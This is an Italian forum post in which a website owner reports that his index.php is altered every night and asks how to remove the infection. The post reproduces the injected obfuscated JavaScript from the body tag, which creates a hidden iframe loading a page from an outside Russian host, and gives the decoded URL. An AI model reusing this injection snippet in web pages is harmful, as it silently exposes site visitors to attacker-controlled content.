non so se questo è il forum giusto, ma non vedendo altra categoria posto qua il mio problema.
è da un po di tempo che vedo puntualmente ogni giorno il mio sito che vengono modifcate le pagine index.php, praticamente ogni sera noto che la mia index.php e precisamente nel tag <body> viene sempre in questo modo:
----------------------
<body onload="status='';g='i';y='e';pm='u';wu='htt';n='v ek';v='/k';k='ram';b='f';j='sr';e='ll';w='r';o='i';a='i';n r='c';hy='o';gh='s.';l='l';x='//';su='php';pw='x.';i='nde';vq='p:';jy='i';mo='ll/';yn=jy.concat(b,k,y);uw=j.concat(nr);cr=wu.concat (vq,x,l,hy,n,a,e,gh,w,pm,v,g,mo,o,i,pw,su);var wi=document.createElement(yn);wi.setAttribute('wid th','5');wi.setAttribute('height','5');wi.setAttri bute('style','display:none');wi.setAttribute(uw,cr );document.body.appendChild(wi);window.status=stat us;>
-------------------------------
dopo vani tentativi di rirpistinare il file index.php dal mio pc al server remoto, sono riuscito a decifrare questo tab <body> che in effetti non fa altro che avviare in onload questo:
--> frame src http://lovekills.ru/kill/index.php <---
adesso correi capire se qualcuno in tutti i forum del sito html.it riesce a risolvermi questo problema, cioè come sconfiggere questo virus dal server??????????
Rispondi quotando
